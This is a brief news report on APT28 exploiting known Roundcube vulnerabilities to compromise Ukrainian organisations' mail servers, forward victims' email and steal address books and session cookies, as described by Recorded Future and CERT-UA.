Russian-Speaking Hackers Target Ukrainian Organizations

Researchers from Recorded Future and CERT-UA have reported that the Russian-speaking hack group APT28 (aka Fancy Bear, BlueDelta, Sednit and Sofacy) have been targeting Roundcube mail servers belonging to several Ukrainian organizations, including government ones.
The hackers have been using spear phishing and bait emails, which are related to special military operations, to force victims to open malicious messages. These messages exploit old vulnerabilities in Roundcube (CVE-2020-35730, CVE-2020-12641 and CVE-2021-44026) to hack unpatched servers.

Malicious Scripts Deployed on Servers

If the compromise was successful, the attackers deployed malicious scripts on the server that redirected incoming messages from victims to an email address controlled by the attackers themselves. These scripts were also used to find and steal the address book of victims, session cookies and other information stored in the Roundcube database.

Military Intelligence Gathering

The researchers believe that the infrastructure used by the hackers in these attacks has been active since around November 2021, and APT28’s activities are aimed at “gathering military intelligence.”